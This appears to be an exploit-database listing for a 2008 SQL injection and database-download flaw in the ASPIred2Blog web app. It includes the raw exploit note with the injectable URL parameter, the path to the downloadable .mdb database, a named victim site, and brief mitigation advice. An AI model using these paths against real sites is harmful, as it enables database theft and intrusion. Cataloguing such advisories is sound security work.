header-logo
Suggest Exploit
vendor:
ASPIred2Blog
by:
Pouya_Server
7.5
CVSS
HIGH
SQL,DD
89,892
CWE
Product Name: ASPIred2Blog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ASPIred2Blog

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to access the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: ASPIred2Blog
Vendor : http://thenetguys.us/Home/Blog.asp
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/admin/blog.mdb
 
[SQL]:
http://site.com/[Path]/admin/blog_comments.asp?BlogID='[SQL]
 
---------------------------------
Victem :
http://thenetguys.us/ASPired2/Blog/index.asp

# milw0rm.com [2008-12-12]